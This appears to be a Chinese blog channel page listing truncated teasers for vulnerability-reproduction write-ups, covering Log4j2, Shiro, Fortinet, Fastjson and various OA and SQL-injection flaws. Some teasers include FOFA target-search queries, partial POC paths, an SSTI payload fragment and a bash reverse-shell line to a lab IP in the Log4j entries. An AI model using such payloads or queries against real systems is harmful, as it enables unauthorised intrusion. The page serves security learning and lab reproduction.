VulHub漏洞复现第23页

【漏洞复现】 Shiro 反序列化漏洞

一、漏洞介绍ApacheShiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。ApacheShiro1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。漏洞原理shiro默认使用

渗透测试老鸟-九青·2023-11-09 00:05

漏洞复现--中远麒麟堡垒机SQL注入

免责声明：文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！一：漏洞描述麒麟堡垒机用于运维管理的认证、授权、审计等监控管理，在该产品admin.php处存在SQL注入漏洞二:

芝士土包鼠·2023-11-08 22:55

明御安全网关任意文件上传漏洞复现

漏洞复现FOFA语法：title="明御安全网关"访问页面如下：POC：/webui/?g=aaa_portal

Ling-cheng·2023-11-08 22:53

时空智友企业信息管理系统任意文件读取漏洞复现

漏洞复现FOFA语法：body="时空智友企业信息管理"访问页面如下所示：POC：POST请求/login：op=verify%7Clogin&targe

Ling-cheng·2023-11-08 22:53

漏洞复现-中远麒麟堡垒机sql注入

免责声明：文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责一：漏洞描述中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资源的安全。麒麟堡垒机存在SQL注入漏洞漏洞。二

Amica.·2023-11-08 22:52

中远麒麟堡垒机SQL注入漏洞复现

漏洞复现FOFA语法：body="url=\"admin.php?

Ling-cheng·2023-11-08 22:51

Flask（Jinja2）服务端模板注入漏洞(SSTI)

name={{7*7}}回显49说明漏洞存在vulhub给出的payload:{%forcin[].__class__.__base__.__subclasses__()%}{%ifc.

XXX_WXY·2023-11-08 21:32

高效自学-网络安全（黑客技术）

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容，包括信息收集，web安全，渗透工具精通，漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差

羊村最强沸羊羊·2023-11-08 21:17

Vmware CVE-2021-21972漏洞复现

一、漏洞简介vSphere是VMware推出的虚拟化平台套件，包含ESXi、vCenterServer等一系列的软件。其中vCenterServer为ESXi的控制中心，可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机。vSphereClient（HTML5）在vCenterServer插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenterSer

A3word_C·2023-11-08 21:33

Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

JuniperNetworksJunosOSEX远程命令执行漏洞（CVE-2023-36845）免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa:body="J-web"||title="JuniperWebDeviceManager"漏洞复现

小胡yhu·2023-11-08 19:10

MeterSphere 任意文件读取漏洞（CVE-2023-25814）

MeterSphere任意文件读取漏洞（CVE-2023-25814）免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa:title="MeterSphere"漏洞复现1.构造poc2.发送数据包3.查看文件免责声明仅用于技术交流

小胡yhu·2023-11-08 19:10

爱思华宝邮件服务器本地文件包含漏洞

爱思华宝邮件服务器本地文件包含漏洞免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa:title="Icewarpwebklient"漏洞复现1.构造poc2.读取文件免责声明仅用于技术交流,目的是向相关安全人员展示漏洞利用方式

小胡yhu·2023-11-08 19:09

飞塔CVE-2022-40684复现

：FortiGate虚拟化环境下载FortiGate-VM：登录后台：配置IP：配置网关：（获取试用授权）配置DNS：（获取试用授权）开启RestAPI：（方便后期查看攻击日志）注册账号打开web界面漏洞复现

G3et·2023-11-08 19:38

CVE-2018-13382 环境搭建+漏洞复现

CVE-2018-13382环境搭建+漏洞复现一.环境搭建因为该漏洞和CVE-2018-13379所需要的环境是相同的，均处于Fortigate路由器的SSLVPN登录界面，所以环境搭建步骤就不再赘述了

yxngu·2023-11-08 19:07

CVE-2022-40684 Fortinet多个产品身份验证绕过漏洞复现

目录0x01声明：0x02简介：0x03漏洞概述：0x04影响版本：0x05环境搭建：

Evan Kang·2023-11-08 19:37

CVE-2018-13379 环境搭建+漏洞复现

CVE-2018-13379环境搭建+漏洞复现在复现该漏洞时候，发现网上的文章很少有本地复现的，所以将该漏洞的复现过程和环境的搭建写成文章，方便自己温习，也方便大家参考。

yxngu·2023-11-08 19:36

Fortigate SSL VPN路径遍历漏洞（CVE-2018-13379）

FortigateSSLVPN路径遍历漏洞（CVE-2018-13379）免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa:body="FortiTokenclockdriftdetected"漏洞复现

小胡yhu·2023-11-08 19:33

通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]

文章目录通达OAget_datas.php前台sql注入-可获取数据库session登入后台漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境

gaynell·2023-11-08 18:20

新开普智慧校园系统RCE漏洞 [附POC]

文章目录新开普智慧校园系统RCE漏洞[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议新开普智慧校园系统RCE

gaynell·2023-11-08 18:20

CNVD-C-2023-76801：用友NC uapjs RCE漏洞复现[附POC]

文章目录用友NCuapjsRCE漏洞复现(CNVD-C-2023-76801)[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现

gaynell·2023-11-08 18:02

【Web安全】CORS跨域资源共享漏洞

文章目录前言一、漏洞概述二、漏洞原理三、CORS响应头类型四、漏洞挖掘五、修复建议前言本篇文章主要介绍CORS跨域漏洞产生的原理，漏洞复现过程，挖掘手段以及如何进行修复，文章难免会有失误，烦请留下宝贵建议

李火火安全阁·2023-11-08 16:06

vulhub venom

文章目录靶场环境信息收集ftp服务二、信息利用三、任意文件上传三sudo提权靶场环境`vmware靶场信息：https://www.vulnhub.com/entry/venom-1,701/下载地址：https://download.vulnhub.com/venom/venom.zip新建虚拟机打开下载后的ovf文件遇见导入失败合规性检查时，重试加载即可攻击机kalinet模式受害机venom

GuiltyFet·2023-11-08 15:23

vulnhub Funbox: Under Construction

~VulnHub漏洞复现：探测靶机的IP地址nmap进行探测靶机的服务和端口访问80端口dirb扫描目录，发现catalog目录访问一下，发现是个oscommerce的网站查看版本的漏洞，发现命令执行漏洞查看该文件

xzhome·2023-11-08 12:43

Fastjson 1.2.47 RCE漏洞复现

一、漏洞特征Fastjson提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型，Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意

只为了拿0day·2023-11-08 05:02

漏洞复现——log4j2-rce（CVE-2021-44228）

一、漏洞介绍漏洞名称：ApacheLog4j2远程代码执行漏洞组件名称：ApacheLog4j2截止2021年1210，受影响的Apachelog4j2版本：2.0≤ApacheLog4j&/dev/tcp/ip/port0>&1此处的ip为192.168.3.3，port可使用任意未被占用的端口，此处指定为5555即bash-i>&/dev/tcp/192.168.3.3/55550>&1对其进

小林话安全·2023-11-08 05:30

[漏洞复现]log4j漏洞RCE(CVE-2021-44228)

文章源自于个人博客:http://vfree.ltd/前言2021/12/09，阿里云安全团队向apache报告了由log4j日志引起的远程代码执行，12月10日，当天白帽跟提前过大年似的，疯狂刷src(利用超级简单)，让部分src平台暂时停止收类似该漏洞，凌晨，很多程序员和安全员被迫起来应急响应，几乎市面上的大厂都受到了该漏洞的影响这里做一个复现学习的小文章，由于对java这方面的知识雀食是薄弱

v.FREE·2023-11-08 05:30

CVE-2021-44228——Log4j2-RCE漏洞复现

漏洞介绍ApacheLog4j2是一个基于java的日志记录工具。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。影响版本ApacheLog4j22.0-beta9-2.15.0（不包括安全版本

Li-D·2023-11-08 05:00

vulfocus Apache log4j2-RCE 漏洞复现（CVE-2021-44228）

根据提示，漏洞存在于http://xxxxx/hello的payload参数中，并以post的方式传参，因此我们可以利用hackerbar进行漏洞验证创建靶场后是这样一个页面。使用payload验证，发现可以触发dnslog，可以确认可以利用证明存在JNDI注入漏洞。在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload，建立1

kb2414·2023-11-08 05:56

log4j2 CVE-2021-44228漏洞复现

Log4j2是对log4j修改后的java日志框架，漏洞影响版本2.0-beta9到2.15.0。用的是log4j还是log4j2区分：1>.Log4j2分为2个jar包，一个是接口log4j-api-${版本号}.jar，一个是具体实现log4j-core-${版本号}.jar，而log4jj只有一个jar包log4j-${版本号}.jar。2>.Log4j2的package名称前缀为org.a

冬6325·2023-11-08 05:23

Log4j2—CVE-2021-44228漏洞复现

漏洞简介2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数

kukuromi·2023-11-08 05:52

log4j2漏洞复现(CVE-2021-44228)

目录漏洞简介：影响版本：复现环境1：复现环境2:复现环境3：复现环境4：安全建议：漏洞简介：log4j是Apache公司的一款JAVA日志框架，基本上只要是java的框架都会用到这个log4j框架，所以上周不管是不是IT圈的都几乎被刷屏了，可见这个洞的危害之大，波及范围之广。所以复现一下。影响版本：ApacheLog4j2.x>=2.0-beta9且&/dev/tcp/192.168.0.16/5

lionwerson·2023-11-08 05:20

log4j2-rce漏洞复现(CVE-2021-44228)

影响版本：ApacheLog4j22.0-beta9-2.15.0（不包括安全版本2.12.2、2.12.3和2.3.1）漏洞编号：CVE-2021-44228漏洞复现利用vulfocus搭建并启动靶场

Z_l123·2023-11-08 05:49

log4j2远程代码执行漏洞复现（CVE-2021-44228）

log4j2远程代码执行漏洞复现（CVE-2021-44228）1.漏洞简介:什么是log4j2Apachelog4j2是一个基于java的日志记录工具，当前被广泛应用于业务系统开发，开发者可以利用该工具将程序的输入输出信息进行日志记录

凤和而歌·2023-11-08 05:19

log4j CVE-2021-44228 RCE漏洞复现

一、漏洞特征ApacheLog4j是Apache的一个开源项目，ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。影响版本：ApacheLog4j2.x&/de

只为了拿0day·2023-11-08 05:45

php越权执行命令漏洞_泛微OA系统多版本存在命令执行漏洞

0x01泛微协同商务软件系统存在命令执行0x02漏洞危害0x03影响范围泛微e-cology<=9.00x04漏洞复现访问http://url/weaver/bsh.servlet.BshServlet

弗兰克邓·2023-11-07 21:19

Apache Log4j2 RCE 远程命令执行漏洞复现与分析

0x00漏洞描述2021年12月10日，国家信息安全漏洞共享平台（CNVD）收录了ApacheLog4j2远程代码执行漏洞（CNVD-2021-95914）。攻击者利用该漏洞，可在未授权的情况下远程执行代码。目前，漏洞利用细节已公开，Apache官方已发布补丁修复该漏洞。ApacheLog4j2是一个基于Java的日志记录组件，该日志组件被广泛应用于业务系统开发，用以记录程序输入输出日志信息，得益

angry_program·2023-11-07 21:38

泛微OA_lang2sql 任意文件上传漏洞复现

漏洞复现FOFA语法：title="移动管理平台-企业管理"页面访问如下：影响的版本偏系统版本比较老一点的系统POC：/emp/lang2sql?

Ling-cheng·2023-11-07 17:16

广联达OA存在信息泄露漏洞复现

文章目录广联达OA存在信息泄露漏洞复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.复现0x06修复建议广联达OA存在信息泄露漏洞复现0x01前言免责声明

gaynell·2023-11-07 13:11

CNVD-2023-08743：宏景HCM SQL注入漏洞复现 [附POC]

文章目录宏景HCMSQL注入漏洞复现(CNVD-2023-08743)[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06

gaynell·2023-11-07 13:36

【代码扫描修复】不安全的反序列化攻击（高危）

补充：Java对象序列化为二进制2.3序列化/反序列化库2.4反序列化漏洞三、漏洞复现：攻击链13.1依赖版本3.2代码复现3.3执行结果3.4漏洞利用原理分析四、漏洞复现：攻击链24.1依赖版本4.2

ACGkaka_·2023-11-07 11:00

漏洞复现--大华ICC readpic任意文件读取漏洞

免责声明：文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负一：漏洞描述ICC，即大华浩睿智能物联综合管理平台。对技术组件进行模块化和松耦合，将解决方案分层分级，提高面向智慧物联

芝士土包鼠·2023-11-07 11:20

漏洞复现--XXL-JOB默认accessToken身份绕过漏洞

免责声明：文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负一：漏洞描述2023年11月1日，深瞳漏洞实验室监测到一则XXL-JOB组件存在认证绕过漏洞的信息，漏洞威胁等级：高危

芝士土包鼠·2023-11-07 11:20

Apache Shiro1.2.4反序列化漏洞——CVE-2016-4437

声明：本文章仅作学习使用，其他用途与本文无关目录一、ubuntu安装docker及vulhub二、漏洞复现1.漏洞发现2.勾选rememberme再次测试3.使用shiro_attack-2.2工具检测并利用

学习的小白_·2023-11-07 10:30

CVE-2016-4437 Shiro反序列化漏洞复现

一、漏洞概述ApacheShiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。ApacheShiro1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。二、影响版本ApacheS

wavesky111·2023-11-07 10:59

CVE-2016-4437---Shiro反序列化漏洞

3、漏洞复现这里使用的环境是Kali中的vu

Anony吧·2023-11-07 10:57

Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

漏洞分析根据加密的顺序，不难知道解密的顺序为：登入验证(二）环境搭建1、本地复现0x01源代码0x02pom.xml修改：0x03tomcat服务器0x04ysoserial-jar依赖0x05访问端口2、vulhub

@Camelus·2023-11-07 10:53

【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规文章目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证说明内容漏洞编号CVE-2017

过期的秋刀鱼-·2023-11-07 10:52

Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）复现

Shiro漏洞复现前言一、ApacheShiro1.2.4反序列化漏洞（CVE-2016-4437）0x01漏洞描述0x02影响范围0x03漏洞利用1.py脚本2.ShiroExploit.jar工具0x04

LuckyCharm~·2023-11-07 10:51

shiro反序列化漏洞(CVE-2016-4437)漏洞复现

shiro反序列化漏洞(CVE-2016-4437)漏洞复现1、漏洞描述ApacheShiro是一款开源强大且易用的Java安全框架，提供身份验证、授权、密码学和会话管理。

HEAVM·2023-11-07 10:21

【漏洞复现】Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)

感谢互联网提供分享知识与智慧，在法治的社会里，请遵守有关法律法规文章目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证说明内容漏洞编号CVE-2016

过期的秋刀鱼-·2023-11-07 10:49

推荐频道

VulHub漏洞复现